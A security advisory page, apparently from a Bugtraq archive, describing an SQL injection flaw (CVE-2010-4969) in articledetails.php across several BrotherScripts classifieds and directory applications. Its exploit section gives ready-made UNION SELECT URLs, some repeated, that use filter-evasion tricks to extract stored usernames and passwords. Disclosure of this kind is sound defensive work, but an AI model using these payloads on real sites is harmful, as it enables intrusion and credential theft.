Multiple BrotherScripts 'articledetails.php' SQL Injection Vulnerability
BID:41368
Info
Multiple BrotherScripts 'articledetails.php' SQL Injection Vulnerability
| Bugtraq ID: | 41368 |
| Class: | Input Validation Error |
| CVE: |
CVE-2010-4969 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 05 2010 12:00AM |
| Updated: | Nov 03 2011 04:03PM |
| Credit: | Sid3^effects |
| Vulnerable: |
BrotherScripts Scripts Directory 0 BrotherScripts Home Classifieds 0 BrotherScripts Events Directory 0 BrotherScripts Classifieds Ads 0 BrotherScripts Business Directory 0 BrotherScripts Auto Classifieds 0 BrotherScripts Auction Software 0 |
| Not Vulnerable: | |
Discussion
Multiple BrotherScripts 'articledetails.php' SQL Injection Vulnerability
Multiple BrotherScripts applications are prone to an SQL-injection vulnerability because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following are affected:
Auto Classifieds
Home Classifieds
Business Directory
Classifieds Ads
Events Directory
Auction Software
Scripts Directory
Multiple BrotherScripts applications are prone to an SQL-injection vulnerability because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following are affected:
Auto Classifieds
Home Classifieds
Business Directory
Classifieds Ads
Events Directory
Auction Software
Scripts Directory
Exploit / POC
Multiple BrotherScripts 'articledetails.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following exploit and example URIs are available:
http://www.example.com/path/articlesdetails.php?id=[sql]
BrotherScripts Business Directory:
http://www.example.com/Business_Directory/articlesdetails.php?id=%27/**/+
uNiOn+/**/sEleCt+/**/1,2,gRoUp_cOnCat%28user,0x3a,pass%29+/**/fRoM+/**/fpoll_config--+
BrotherScripts Classifieds Ads:
http://www.example.com/General_Classifieds/articlesdetails.php?id='/**/+
uNiOn+/**/SeLeCt+/**/1,gRoUp_cOnCat(user,0x3a,pass),3+/**/fRoM+/**/fpoll_config--+
BrotherScripts Events Directory:
http://www.example.com/Events_Locator/articlesdetails.php?id='+/**/uNiOn+/**/
SeLeCt+/**/1,version(),3--+
Attackers can use a browser to exploit this issue.
The following exploit and example URIs are available:
http://www.example.com/path/articlesdetails.php?id=[sql]
BrotherScripts Business Directory:
http://www.example.com/Business_Directory/articlesdetails.php?id=%27/**/+
uNiOn+/**/sEleCt+/**/1,2,gRoUp_cOnCat%28user,0x3a,pass%29+/**/fRoM+/**/fpoll_config--+
BrotherScripts Classifieds Ads:
http://www.example.com/General_Classifieds/articlesdetails.php?id='/**/+
uNiOn+/**/SeLeCt+/**/1,gRoUp_cOnCat(user,0x3a,pass),3+/**/fRoM+/**/fpoll_config--+
BrotherScripts Events Directory:
http://www.example.com/Events_Locator/articlesdetails.php?id='+/**/uNiOn+/**/
SeLeCt+/**/1,version(),3--+
Solution / Fix
Multiple BrotherScripts 'articledetails.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Multiple BrotherScripts 'articledetails.php' SQL Injection Vulnerability
References:
References:
- BrotherScripts Homepage (BrotherScripts)